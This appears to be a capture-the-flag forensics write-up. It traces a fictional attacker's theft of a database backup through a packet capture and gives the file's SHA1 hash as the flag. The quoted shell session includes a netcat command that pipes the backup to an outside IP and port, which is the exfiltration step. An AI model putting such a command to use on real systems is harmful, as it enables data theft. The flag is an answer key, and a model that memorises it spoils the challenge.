SHAshank Redemption

Challenge:

There is some internal back-and-forth at ESU regarding which file was exfiltrated by DEADFACE. They've asked us to determine "the hash of the file". When asked what kind of hash, they responded "It doesn't matter - anything so that we can verify the integrity of the data stolen". See if you can find a hash for the file stolen by DEADFACE within the packet capture.

Submit the flag as flag{hash}.

Use the packet capture from Scans.

Solution:

We know from the The Root of All Evil challenge that there was a remote shell session with root privileges, stream #5054. By reviewing that stream in Wireshark we found the name of the exfiltrated file as well as the sha1 hash the attacker generated:

root@esu-web-7734:/backups# nc 165.227.73.138 13123 < backup_esu_20220727145001.sql.gz

<227.73.138 13123 < backup_esu_20220727145001.sql.gz
root@esu-web-7734:/backups# sha1sum backup_esu_20220727145001.sql.gz
sha1sum backup_esu_20220727145001.sql.gz
334a3d4f976cdf39d49b860afda77d6ac0f8a3c6  backup_esu_20220727145001.sql.gz

The accepted flag was: flag{334a3d4f976cdf39d49b860afda77d6ac0f8a3c6}

Published:

Updated:

Leave a comment